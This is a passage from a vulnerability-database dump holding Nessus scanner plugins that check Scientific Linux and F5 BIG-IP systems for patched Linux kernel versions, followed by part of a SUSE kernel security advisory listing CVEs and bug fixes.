a\n result, hot unplugging of the virtio-blk device no\n longer causes the guest kernel oops when there are\n in-flight I/O requests.\n\n - Before this update, due to a bug in the error-handling\n path, a corrupted metadata block could be used as a\n valid block. With this update, the error handling path\n has been fixed and more checks have been added to verify\n the metadata block. Now, when a corrupted metadata block\n is encountered, it is properly marked as corrupted and\n handled accordingly.\n\n - Previously, an incorrectly initialized variable resulted\n in a random value being stored in the variable that\n holds the number of default ACLs, and is sent in the\n SET_PATH_INFO data structure. Consequently, the setfacl\n command could, under certain circumstances, fail with an\n 'Invalid argument' error. With this update, the variable\n is correctly initialized to zero, thus fixing the bug.\n\nThe system must be rebooted for this update to take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1502&L=scientific-linux-errata&T=0&P=901\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?173e2366\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-PAE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-PAE-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-PAE-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/03/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 5.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"kernel-2.6.18-402.el5\")) flag++;\nif (rpm_check(release:\"SL5\", cpu:\"i386\", reference:\"kernel-PAE-2.6.18-402.el5\")) flag++;\nif (rpm_check(release:\"SL5\", cpu:\"i386\", reference:\"kernel-PAE-debuginfo-2.6.18-402.el5\")) flag++;\nif (rpm_check(release:\"SL5\", cpu:\"i386\", reference:\"kernel-PAE-devel-2.6.18-402.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-debug-2.6.18-402.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-debug-debuginfo-2.6.18-402.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-debug-devel-2.6.18-402.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-debuginfo-2.6.18-402.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-debuginfo-common-2.6.18-402.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-devel-2.6.18-402.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-doc-2.6.18-402.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-headers-2.6.18-402.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-xen-2.6.18-402.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-xen-debuginfo-2.6.18-402.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-xen-devel-2.6.18-402.el5\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-PAE / kernel-PAE-debuginfo / kernel-PAE-devel / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T02:08:16", "description": "The implementation of certain splice_write file operations in the\nLinux kernel before 3.16 does not enforce a restriction on the maximum\nsize of a single file, which allows local users to cause a denial of\nservice (system crash) or possibly have unspecified other impact via a\ncrafted splice system call, as demonstrated by use of a file\ndescriptor associated with an ext4 filesystem.", "edition": 27, "published": "2015-09-09T00:00:00", "title": "F5 Networks BIG-IP : Linux kernel vulnerability (SOL17237)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7822"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/h:f5:big-ip_protocol_security_manager", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_wan_optimization_manager", "cpe:/h:f5:big-ip", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_webaccelerator", "cpe:/a:f5:big-ip_access_policy_manager"], "id": "F5_BIGIP_SOL17237.NASL", "href": "https://www.tenable.com/plugins/nessus/85854", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution SOL17237.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85854);\n script_version(\"2.6\");\n script_cvs_date(\"Date: 2019/01/04 10:03:40\");\n\n script_cve_id(\"CVE-2014-7822\");\n script_bugtraq_id(72347);\n\n script_name(english:\"F5 Networks BIG-IP : Linux kernel vulnerability (SOL17237)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The implementation of certain splice_write file operations in the\nLinux kernel before 3.16 does not enforce a restriction on the maximum\nsize of a single file, which allows local users to cause a denial of\nservice (system crash) or possibly have unspecified other impact via a\ncrafted splice system call, as demonstrated by use of a file\ndescriptor associated with an ext4 filesystem.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K17237\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution SOL17237.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"SOL17237\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"11.3.0-11.6.0\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"12.0.0\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"11.4.0-11.6.0\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"12.0.0\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"11.0.0-11.6.0\",\"10.1.0-10.2.4\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"12.0.0\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"11.0.0-11.6.0\",\"10.1.0-10.2.4\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"12.0.0\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"11.0.0-11.6.0\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"12.0.0\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"11.0.0-11.6.0\",\"10.1.0-10.2.4\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"12.0.0\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"11.0.0-11.6.0\",\"10.1.0-10.2.4\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"12.0.0\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"11.3.0-11.6.0\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"12.0.0\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T11:48:25", "bulletinFamily": "unix", "cvelist": ["CVE-2015-4692", "CVE-2015-5364", "CVE-2014-9728", "CVE-2014-9730", "CVE-2015-5366", "CVE-2014-9729", "CVE-2015-3212", "CVE-2015-4167", "CVE-2014-9731", "CVE-2015-4036", "CVE-2015-1805"], "description": "The SUSE Linux Enterprise 12 kernel was updated to 3.12.44 to receive\n various security and bugfixes.\n\n These features were added:\n - mpt2sas: Added Reply Descriptor Post Queue (RDPQ) Array support\n (bsc#854824).\n - mpt3sas: Bump mpt3sas driver version to 04.100.00.00 (bsc#854817).\n\n Following security bugs were fixed:\n - CVE-2015-1805: iov overrun for failed atomic copy could have lead to DoS\n or privilege escalation (bsc#933429).\n - CVE-2015-3212: A race condition in the way the Linux kernel handled\n lists of associations in SCTP sockets could have lead to list corruption\n and kernel panics (bsc#936502).\n - CVE-2015-4036: DoS via memory corruption in vhost/scsi driver\n (bsc#931988).\n - CVE-2015-4167: Linux kernel built with the UDF file\n system(CONFIG_UDF_FS) support was vulnerable to a crash. It occurred\n while fetching inode information from a corrupted/malicious udf file\n system image (bsc#933907).\n - CVE-2015-4692: DoS via NULL pointer dereference in kvm_apic_has_events\n function (bsc#935542).\n - CVE-2015-5364: Remote DoS via flood of UDP packets with invalid\n checksums (bsc#936831).\n - CVE-2015-5366: Remote DoS of EPOLLET epoll applications via flood of UDP\n packets with invalid checksums (bsc#936831).\n\n Security issues already fixed in the previous update but not referenced by\n CVE:\n - CVE-2014-9728: Kernel built with the UDF file system(CONFIG_UDF_FS)\n support were vulnerable to a crash (bsc#933904).\n - CVE-2014-9729: Kernel built with the UDF file system(CONFIG_UDF_FS)\n support were vulnerable to a crash (bsc#933904).\n - CVE-2014-9730: Kernel built with the UDF file system(CONFIG_UDF_FS)\n support were vulnerable to a crash (bsc#933904).\n - CVE-2014-9731: Kernel built with the UDF file system(CONFIG_UDF_FS)\n support were vulnerable to information leakage (bsc#933896).\n\n The following non-security bugs were fixed:\n - ALSA: hda - add codec ID for Skylake display audio codec (bsc#936556).\n - ALSA: hda/hdmi - apply Haswell fix-ups to Skylake display codec\n (bsc#936556).\n - ALSA: hda_controller: Separate stream_tag for input and output streams\n (bsc#936556).\n - ALSA: hda_intel: add AZX_DCAPS_I915_POWERWELL for SKL and BSW\n (bsc#936556).\n - ALSA: hda_intel: apply the Seperate stream_tag for Skylake (bsc#936556).\n - ALSA: hda_intel: apply the Seperate stream_tag for Sunrise Point\n (bsc#936556).\n - Btrfs: Handle unaligned length in extent_same (bsc#937609).\n - Btrfs: add missing inode item update in fallocate() (bsc#938023).\n - Btrfs: check pending chunks when shrinking fs to avoid corruption\n (bsc#936445).\n - Btrfs: do not update mtime/ctime on deduped inodes (bsc#937616).\n - Btrfs: fix block group ->space_info null pointer dereference\n (bsc#935088).\n - Btrfs: fix clone / extent-same deadlocks (bsc#937612).\n - Btrfs: fix deadlock with extent-same and readpage (bsc#937612).\n - Btrfs: fix fsync data loss after append write (bsc#936446).\n - Btrfs: fix hang during inode eviction due to concurrent readahead\n (bsc#935085).\n - Btrfs: fix memory leak in the extent_same ioctl (bsc#937613).\n - Btrfs: fix race when reusing stale extent buffers that leads to BUG_ON\n (bsc#926369).\n - Btrfs: fix use after free when close_ctree frees the orphan_rsv\n (bsc#938022).\n - Btrfs: pass unaligned length to btrfs_cmp_data() (bsc#937609).\n - Btrfs: provide super_operations->inode_get_dev (bsc#927455).\n - Drivers: hv: balloon: check if ha_region_mutex was acquired in\n MEM_CANCEL_ONLINE case.\n - Drivers: hv: fcopy: process deferred messages when we complete the\n transaction.\n - Drivers: hv: fcopy: rename fcopy_work -> fcopy_timeout_work.\n - Drivers: hv: fcopy: set .owner reference for file operations.\n - Drivers: hv: fcopy: switch to using the hvutil_device_state state\n machine.\n - Drivers: hv: hv_balloon: correctly handle num_pages>INT_MAX case.\n - Drivers: hv: hv_balloon: correctly handle val.freeram lower than\n num_pages case.\n - Drivers: hv: hv_balloon: do not lose memory when onlining order is not\n natural.\n - Drivers: hv: hv_balloon: do not online pages in offline blocks.\n - Drivers: hv: hv_balloon: eliminate jumps in piecewiese linear floor\n function.\n - Drivers: hv: hv_balloon: eliminate the trylock path in\n acquire/release_region_mutex.\n - Drivers: hv: hv_balloon: keep locks balanced on add_memory() failure.\n - Drivers: hv: hv_balloon: refuse to balloon below the floor.\n - Drivers: hv: hv_balloon: report offline pages as being used.\n - Drivers: hv: hv_balloon: survive ballooning request with num_pages=0.\n - Drivers: hv: kvp: move poll_channel() to hyperv_vmbus.h.\n - Drivers: hv: kvp: rename kvp_work -> kvp_timeout_work.\n - Drivers: hv: kvp: reset kvp_context.\n - Drivers: hv: kvp: switch to using the hvutil_device_state state machine.\n - Drivers: hv: util: Fix a bug in the KVP code. reapply upstream change\n ontop of v3.12-stable change\n - Drivers: hv: util: On device remove, close the channel after\n de-initializing the service.\n - Drivers: hv: util: introduce hv_utils_transport abstraction.\n - Drivers: hv: util: introduce state machine for util drivers.\n - Drivers: hv: util: move kvp/vss function declarations to hyperv_vmbus.h.\n - Drivers: hv: vmbus: Add device and vendor ID to vmbus devices.\n - Drivers: hv: vmbus: Add support for VMBus panic notifier handler\n (bsc#934160).\n - Drivers: hv: vmbus: Add support for the NetworkDirect GUID.\n - Drivers: hv: vmbus: Correcting truncation error for constant\n HV_CRASH_CTL_CRASH_NOTIFY (bsc#934160).\n - Drivers: hv: vmbus: Export the vmbus_sendpacket_pagebuffer_ctl().\n - Drivers: hv: vmbus: Fix a bug in rescind processing in\n vmbus_close_internal().\n - Drivers: hv: vmbus: Fix a siganlling host signalling issue.\n - Drivers: hv: vmbus: Get rid of some unnecessary messages.\n - Drivers: hv: vmbus: Get rid of some unused definitions.\n - Drivers: hv: vmbus: Handle both rescind and offer messages in the same\n context.\n - Drivers: hv: vmbus: Implement the protocol for tearing down vmbus state.\n - Drivers: hv: vmbus: Introduce a function to remove a rescinded offer.\n - Drivers: hv: vmbus: Perform device register in the per-channel work\n element.\n - Drivers: hv: vmbus: Permit sending of packets without payload.\n - Drivers: hv: vmbus: Properly handle child device remove.\n - Drivers: hv: vmbus: Remove the channel from the channel list(s) on\n failure.\n - Drivers: hv: vmbus: Suport an API to send packet with additional control.\n - Drivers: hv: vmbus: Suport an API to send pagebuffers with additional\n control.\n - Drivers: hv: vmbus: Teardown clockevent devices on module unload.\n - Drivers: hv: vmbus: Teardown synthetic interrupt controllers on module\n unload.\n - Drivers: hv: vmbus: Use a round-robin algorithm for picking the\n outgoing channel.\n - Drivers: hv: vmbus: Use the vp_index map even for channels bound to CPU\n 0.\n - Drivers: hv: vmbus: avoid double kfree for device_obj.\n - Drivers: hv: vmbus: briefly comment num_sc and next_oc.\n - Drivers: hv: vmbus: decrease num_sc on subchannel removal.\n - Drivers: hv: vmbus: distribute subchannels among all vcpus.\n - Drivers: hv: vmbus: do cleanup on all vmbus_open() failure paths.\n - Drivers: hv: vmbus: introduce vmbus_acpi_remove.\n - Drivers: hv: vmbus: kill tasklets on module unload.\n - Drivers: hv: vmbus: move init_vp_index() call to vmbus_process_offer().\n - Drivers: hv: vmbus: prevent cpu offlining on newer hypervisors.\n - Drivers: hv: vmbus: rename channel work queues.\n - Drivers: hv: vmbus: teardown hv_vmbus_con workqueue and vmbus_connection\n pages on shutdown.\n - Drivers: hv: vmbus: unify calls to percpu_channel_enq().\n - Drivers: hv: vmbus: unregister panic notifier on module unload.\n - Drivers: hv: vmbus:Update preferred vmbus protocol version to windows 10.\n - Drivers: hv: vss: process deferred messages when we complete the\n transaction.\n - Drivers: hv: vss: switch to using the hvutil_device_state state machine.\n - Enable CONFIG_BRIDGE_NF_EBTABLES on s390x (bsc#936012)\n - Fix connection reuse when sk_error_report is used (bsc#930972).\n - GHES: Carve out error queueing in a separate function (bsc#917630).\n - GHES: Carve out the panic functionality (bsc#917630).\n - GHES: Elliminate double-loop in the NMI handler (bsc#917630).\n - GHES: Make NMI handler have a single reader (bsc#917630).\n - GHES: Panic right after detection (bsc#917630).\n - IB/mlx4: Fix wrong usage of IPv4 protocol for multicast attach/detach\n (bsc#918618).\n - Initialize hv_netvsc_packet->xmit_more to avoid transfer stalls\n - KVM: PPC: BOOK3S: HV: CMA: Reserve cma region only in hypervisor mode\n (bsc#908491).\n - KVM: s390: virtio-ccw: Handle command rejects (bsc#931860).\n - MODSIGN: loading keys from db when SecureBoot disabled (bsc#929696).\n - MODSIGN: loading keys from db when SecureBoot disabled (bsc#929696).\n - PCI: pciehp: Add hotplug_lock to serialize hotplug events (bsc#866911).\n - Revert "MODSIGN: loading keys from db when SecureBoot disabled". This\n reverts commit b45412d4, because it breaks legacy boot.\n - SUNRPC: Report connection error values to rpc_tasks on the pending queue\n (bsc#930972).\n - Update s390x kabi files with netfilter change (bsc#936012)\n - client MUST ignore EncryptionKeyLength if CAP_EXTENDED_SECURITY is set\n (bsc#932348).\n - cpufreq: pcc: Enable autoload of pcc-cpufreq for ACPI processors\n (bsc#933117).\n - dmapi: fix value from newer Linux strnlen_user() (bsc#932897).\n - drm/i915/hsw: Fix workaround for server AUX channel clock divisor\n (bsc#935918).\n - drm/i915: Evict CS TLBs between batches (bsc#935918).\n - drm/i915: Fix DDC probe for passive adapters (bsc#935918).\n - drm/i915: Handle failure to kick out a conflicting fb driver\n (bsc#935918).\n - drm/i915: drop WaSetupGtModeTdRowDispatch:snb (bsc#935918).\n - drm/i915: save/restore GMBUS freq across suspend/resume on gen4\n (bsc#935918).\n - edd: support original Phoenix EDD 3.0 information (bsc#929974).\n - ext4: fix over-defensive complaint after journal abort (bsc#935174).\n - fs/cifs: Fix corrupt SMB2 ioctl requests (bsc#931124).\n - ftrace: add oco handling patch (bsc#924526).\n - ftrace: allow architectures to specify ftrace compile options\n (bsc#924526).\n - ftrace: let notrace function attribute disable hotpatching if necessary\n (bsc#924526).\n - hugetlb, kabi: do not account hugetlb pages as NR_FILE_PAGES\n (bsc#930092).\n - hugetlb: do not account hugetlb pages as NR_FILE_PAGES (bsc#930092).\n - hv: channel: match var type to return type of wait_for_completion.\n - hv: do not schedule new works in vmbus_onoffer()/vmbus_onoffer_rescind().\n - hv: hv_balloon: match var type to return type of wait_for_completion.\n - hv: hv_util: move vmbus_open() to a later place.\n - hv: hypervvssd: call endmntent before call setmntent again.\n - hv: no rmmod for hv_vmbus and hv_utils.\n - hv: remove the per-channel workqueue.\n - hv: run non-blocking message handlers in the dispatch tasklet.\n - hv: vmbus: missing curly braces in vmbus_process_offer().\n - hv: vmbus_free_channels(): remove the redundant free_channel().\n - hv: vmbus_open(): reset the channel state on ENOMEM.\n - hv: vmbus_post_msg: retry the hypercall on some transient errors.\n - hv_netvsc: Allocate the receive buffer from the correct NUMA node.\n - hv_netvsc: Allocate the sendbuf in a NUMA aware way.\n - hv_netvsc: Clean up two unused variables.\n - hv_netvsc: Cleanup the test for freeing skb when we use sendbuf\n mechanism.\n - hv_netvsc: Define a macro RNDIS_AND_PPI_SIZE.\n - hv_netvsc: Eliminate memory allocation in the packet send path.\n - hv_netvsc: Fix a bug in netvsc_start_xmit().\n - hv_netvsc: Fix the packet free when it is in skb headroom.\n - hv_netvsc: Implement batching in send buffer.\n - hv_netvsc: Implement partial copy into send buffer.\n - hv_netvsc: Use the xmit_more skb flag to optimize signaling the host.\n - hv_netvsc: change member name of struct netvsc_stats.\n - hv_netvsc: introduce netif-msg into netvsc module.\n - hv_netvsc: remove unused variable in netvsc_send().\n - hv_netvsc: remove vmbus_are_subchannels_present() in\n rndis_filter_device_add().\n - hv_netvsc: try linearizing big SKBs before dropping them.\n - hv_netvsc: use per_cpu stats to calculate TX/RX data.\n - hv_netvsc: use single existing drop path in netvsc_start_xmit.\n - hv_vmbus: Add gradually increased delay for retries in vmbus_post_msg().\n - hyperv: Implement netvsc_get_channels() ethool op.\n - hyperv: hyperv_fb: match wait_for_completion_timeout return type.\n - iommu/amd: Handle integer overflow in dma_ops_area_alloc (bsc#931538).\n - iommu/amd: Handle large pages correctly in free_pagetable (bsc#935881).\n - ipr: Increase default adapter init stage change timeout (bsc#930579).\n - ipv6: do not delete previously existing ECMP routes if add fails\n (bsc#930399).\n - ipv6: fix ECMP route replacement (bsc#930399).\n - jbd2: improve error messages for inconsistent journal heads (bsc#935174).\n - jbd2: revise KERN_EMERG error messages (bsc#935174).\n - kabi/severities: Add s390 symbols allowed to change in bsc#931860\n - kabi: only use sops->get_inode_dev with proper fsflag.\n - kernel: add panic_on_warn.\n - kexec: allocate the kexec control page with KEXEC_CONTROL_MEMORY_GFP\n (bsc#928131).\n - kgr: fix redirection on s390x arch (bsc#903279).\n - kgr: move kgr_task_in_progress() to sched.h.\n - kgr: send a fake signal to all blocking tasks.\n - kvm: irqchip: Break up high order allocations of kvm_irq_routing_table\n (bsc#926953).\n - libata: Blacklist queued TRIM on all Samsung 800-series (bsc#930599).\n - mei: bus: () can be static.\n - mm, thp: really limit transparent hugepage allocation to local node (VM\n Performance, bsc#931620).\n - mm, thp: respect MPOL_PREFERRED policy with non-local node (VM\n Performance, bsc#931620).\n - mm/mempolicy.c: merge alloc_hugepage_vma to alloc_pages_vma (VM\n Performance, bsc#931620).\n - mm/thp: allocate transparent hugepages on local node (VM Performance,\n bsc#931620).\n - net/mlx4_en: Call register_netdevice in the proper location (bsc#858727).\n - net/mlx4_en: Do not attempt to TX offload the outer UDP checksum for\n VXLAN (bsc#858727).\n - net: fib6: fib6_commit_metrics: fix potential NULL pointer dereference\n (bsc#867362).\n - net: introduce netdev_alloc_pcpu_stats() for drivers.\n - net: ipv6: fib: do not sleep inside atomic lock (bsc#867362).\n - netdev: set __percpu attribute on netdev_alloc_pcpu_stats.\n - netdev_alloc_pcpu_stats: use less common iterator variable.\n - netfilter: xt_NFQUEUE: fix --queue-bypass regression (bsc#935083)\n - ovl: default permissions (bsc#924071).\n - ovl: move s_stack_depth .\n - powerpc/perf/hv-24x7: use kmem_cache instead of aligned stack\n allocations (bsc#931403).\n - powerpc/pseries: Correct cpu affinity for dlpar added cpus (bsc#932967).\n - powerpc: Add VM_FAULT_HWPOISON handling to powerpc page fault handler\n (bsc#929475).\n - powerpc: Fill in si_addr_lsb siginfo field (bsc#929475).\n - powerpc: Simplify do_sigbus (bsc#929475).\n - reiserfs: Fix use after free in journal teardown (bsc#927697).\n - rtlwifi: rtl8192cu: Fix kernel deadlock (bsc#927786).\n - s390/airq: add support for irq ranges (bsc#931860).\n - s390/airq: silence lockdep warning (bsc#931860).\n - s390/compat,signal: change return values to -EFAULT (bsc#929879).\n - s390/ftrace: hotpatch support for function tracing (bsc#924526).\n - s390/irq: improve displayed interrupt order in /proc/interrupts\n (bsc#931860).\n - s390/kernel: use stnsm 255 instead of stosm 0 (bsc#929879).\n - 